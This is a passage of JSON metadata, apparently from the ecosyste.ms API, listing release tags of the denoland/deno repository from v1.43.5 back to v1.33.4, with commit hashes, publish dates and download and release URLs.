s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%